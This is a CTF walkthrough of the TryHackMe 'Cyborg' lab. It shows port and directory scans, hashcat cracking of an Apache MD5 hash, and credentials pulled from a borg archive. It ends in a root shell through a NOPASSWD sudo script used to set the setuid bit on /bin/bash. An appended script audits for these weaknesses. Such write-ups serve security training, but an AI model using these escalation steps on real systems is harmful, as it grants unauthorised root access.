Cyborg | Walkthrough | Tryhackme


/////JOINED Cyborg CTF/////////

 

———————–SCANNING Cyborg —————————-

JUST STARTED AN NMAP SCAN –

Result –:

nmap -sC -sV 10.10.76.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 15:48 IST
Nmap scan report for 10.10.76.128
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

///————///

THE NMAP SCAN HAS JUST COMPLETED AND WE FOUND 2 OPEN PORTS
1. SSH
2. HTTP

STARTED A GOBUSTER DIRECTORY SCAN –

Result –:

gobuster dir -u http://10.10.76.128 -w /usr/share/wordlists/dirb/common.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.76.128
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/27 15:49:00 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.76.128/admin/]
/etc (Status: 301) [Size: 310] [--> http://10.10.76.128/etc/]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]

===============================================================
2021/07/27 15:51:32 Finished
===============================================================

////———-////

THE GOBUSTER SCAN HAS JUST COMPLETED AND WE FOUND A USEFUL DIRECTORY — ADMIN

IN ADMIN WE FOUND SOME TAR FILES, AN ADMINS' CHAT AND SOME PASSWORDS WHICH ARE HASHED –

——————————CRACKING THE HASHES—————————–

FIRST WE HAVE TO CHECK WHICH HASH TYPE THIS IS, WHICH IS WHY I AM USING THE HASH-IDENTIFIER TOOL THAT COMES PRE-INSTALLED IN KALI LINUX!!

HASH# $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

The result –: Possible Hashes:
[+] MD5(APR)

THE HASH IS MD5(APR), SO IT’S TIME TO CRACK THIS HASH WITH HASHCAT —

hashcat --force -m 1600 -a 0 has /usr/share/wordlists/rockyou.txt

Result –: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.: squidward

AS YOU CAN SEE, THE PASSWORD IS SQUIDWARD!! THIS PASSWORD IS POSSIBLY FOR BORG, WHICH IS USED FOR ENCRYPTING AND COMPRESSING!!

//////////————-//////////

LET’S START DOING THAT !!

borg extract /path/to/archive::music_archive

The result–: Wow I’m awful at remembering Passwords so I’ve taken my Friend’s advice and noting them down!

Alex:[email protected]

SO WE HAVE THE CREDENTIALS FOR THE SSH LOGIN!!

/———————————–GAINING THE SHELL INTO THE MACHINE———————————————————\

AS WE HAVE THE USERNAME AND THE PASSWORD OF THE ALEX USER, WE EASILY GOT THE USER.TXT
cat user.txt >>> — flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

NOW IT’S TIME TO ESCALATE PRIVILEGES TO ROOT!!!

        ————————–PRIVILEGE ESCALATION Cyborg ————————-

SO BY TYPING sudo -l —

Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

SO WE CAN RUN /etc/mp3backups/backup.sh AS ROOT, SO WE JUST HAVE TO MODIFY THAT AND THEN WE CAN HAVE THE ROOT SHELL!!!

SO NOW LET’S START BY TYPING THIS COMMAND —

sudo /etc/mp3backups/backup.sh -c whoami

Result –: root

BY TYPING THIS, WE CAN HAVE ROOT ACCESS, SO LET’S DO IT WITH /bin/bash !!

sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"

bash -p

whoami
root
bash-4.3# cat /root/root.txt = flag[——–flag——]

SO IT’S OVER !!!!!!

/////////////////COMPLETED THE CYBORG /////////////////////
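
The privilege escalation above depends on a NOPASSWD sudo rule for a script and ends with a setuid /bin/bash. As an added example (not part of the original walkthrough; the function names are hypothetical and the sample input is constructed from the `sudo -l` output shown above), these audit helpers list NOPASSWD commands, flag sudo-run scripts that a non-root user could change, and report setuid or setgid shells:

```shell
#!/usr/bin/env bash
# Added audit example, not from the walkthrough. Function names are hypothetical.

# Constructed sample: the `sudo -l` rule shown in the walkthrough.
sample_sudo_l() {
cat <<'EOF'
User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
EOF
}

# Read `sudo -l` text on stdin; print each command path granted with NOPASSWD.
nopasswd_commands() {
    awk '/NOPASSWD:/ {
        sub(/^.*NOPASSWD:[ \t]*/, "")
        n = split($0, cmds, /,[ \t]*/)
        for (i = 1; i <= n; i++) { split(cmds[i], w, " "); print w[1] }
    }'
}

# Print the path if it is not owned by root or is group/world writable,
# i.e. someone other than root could change what sudo runs as root.
modifiable_by_non_root() {
    find "$1" -prune \( ! -user root -o -perm -0020 -o -perm -0002 \) -print 2>/dev/null
}

# Succeed when the file carries the setuid or setgid bit.
has_suid_sgid() { [ -u "$1" ] || [ -g "$1" ]; }

# Print every shell listed in a shells file (default /etc/shells) that is
# setuid/setgid, the state `chmod +s /bin/bash` leaves behind.
suid_shells() {
    shells_file=${1:-/etc/shells}
    [ -r "$shells_file" ] || return 0
    while IFS= read -r shell_path; do
        case $shell_path in ''|\#*) continue ;; esac
        if has_suid_sgid "$shell_path"; then echo "$shell_path"; fi
    done < "$shells_file"
    return 0
}

# Demo on the constructed sample, then on this host's shells.
sample_sudo_l | nopasswd_commands | while IFS= read -r cmd; do
    echo "NOPASSWD rule: $cmd (review what arguments it passes to a shell)"
done
suid_shells | sed 's/^/setuid or setgid shell: /'
```

On a real host, feed it live data with `sudo -l | nopasswd_commands` and pass each reported path to `modifiable_by_non_root`.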

 

 

 
